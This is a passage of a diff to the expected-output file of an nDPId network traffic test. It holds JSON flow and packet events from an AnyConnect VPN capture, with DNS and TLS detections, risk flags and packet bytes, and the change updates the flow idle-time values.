00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569687245366,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1569687245366,"pkt":"NDY7z3UoLH6BsEqhCABFAACVAABAADYRod5LS0xMCgAA4wA183IAgYoMLLeBgAABAAAAAQAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAcAYAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwB8AAAABAAAcIAAAA4QAEnUAAAFRgA=="} 00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245366,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245379,"flow_last_seen":1569687245379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245379,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569687245379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245379,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95WAbsTaDYfAAAAALAC\/\/\/9eAAAAgQFtAEDAwUBAQgKHA16ewAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245420,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4kvsAAPcGt2EIJWZbCgAA4wG73lYzzRbpE2g2IJASgADBAwAAAgQFtAEBCAo\/+VnGHA16ew=="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245420,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95WAbsTaDYgM80W6oAQ\/\/9YmgAAAQEIChwNeqI\/+VnG"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
-01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} -01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5TAbsf\/e\/ecO3V5YAYEAD5fAAAAQEIChwNezsAjX27FwMDADwAAAAAAAAABDacZQu2ja7FJp11i4XaHEcZRuFBd8RaXcXBvhAzXAi\/k3IQYhPu9V\/rSa1OnXc4wt4EKb0="} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5SAbt7aDL2a\/IufIAYEADmYwAAAQEIChwNezsCYFg6FwMDADwAAAAAAAAAA\/6MZ3K3UnwgKSolneP\/V\/Ul5QfA4HWbTZY4CgoWP92J0WcPzatLmBPNGkrfeEXB3KaiGuM="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569687245649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245649,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0y8JAACsGUUw0JfOtCgAA4wG73lNw7dXlH\/3wH4AQAAnwQQAAAQEICgCNhOgcDXs7"} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569687245653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245653,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0VN5AACoGyTA0JfOtCgAA4wG73lJr8i58e2gzN4AQAAkgwQAAAQEICgJgYHkcDXs7"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245688,"flow_last_seen":1569687245688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245688,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569687245688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245688,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95XAbsu53nzAAAAALAC\/\/+c+QAAAgQFtAEDAwUBAQgKHA17pgAAAAAEAgAA"} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569687245727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245727,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4hY0AAPcGxM8IJWZbCgAA4wG73ldszApGLud59JASgAAy9QAAAgQFtAEBCAo\/+Vr5HA17pg=="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569687245727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245727,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95XAbsu53n0bMwKR4AQ\/\/\/KjAAAAQEIChwNe8w\/+Vr5"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
-01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} -01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245379,"flow_last_seen":1569687245379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245379,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569687245379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245379,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95WAbsTaDYfAAAAALAC\/\/\/9eAAAAgQFtAEDAwUBAQgKHA16ewAAAAAEAgAA"} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569687245420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245420,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4kvsAAPcGt2EIJWZbCgAA4wG73lYzzRbpE2g2IJASgADBAwAAAgQFtAEBCAo\/+VnGHA16ew=="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569687245420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245420,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95WAbsTaDYgM80W6oAQ\/\/9YmgAAAQEIChwNeqI\/+VnG"} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} +01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5TAbsf\/e\/ecO3V5YAYEAD5fAAAAQEIChwNezsAjX27FwMDADwAAAAAAAAABDacZQu2ja7FJp11i4XaHEcZRuFBd8RaXcXBvhAzXAi\/k3IQYhPu9V\/rSa1OnXc4wt4EKb0="} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5SAbt7aDL2a\/IufIAYEADmYwAAAQEIChwNezsCYFg6FwMDADwAAAAAAAAAA\/6MZ3K3UnwgKSolneP\/V\/Ul5QfA4HWbTZY4CgoWP92J0WcPzatLmBPNGkrfeEXB3KaiGuM="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569687245649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245649,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0y8JAACsGUUw0JfOtCgAA4wG73lNw7dXlH\/3wH4AQAAnwQQAAAQEICgCNhOgcDXs7"} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569687245653,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245653,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0VN5AACoGyTA0JfOtCgAA4wG73lJr8i58e2gzN4AQAAkgwQAAAQEICgJgYHkcDXs7"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245688,"flow_last_seen":1569687245688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245688,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 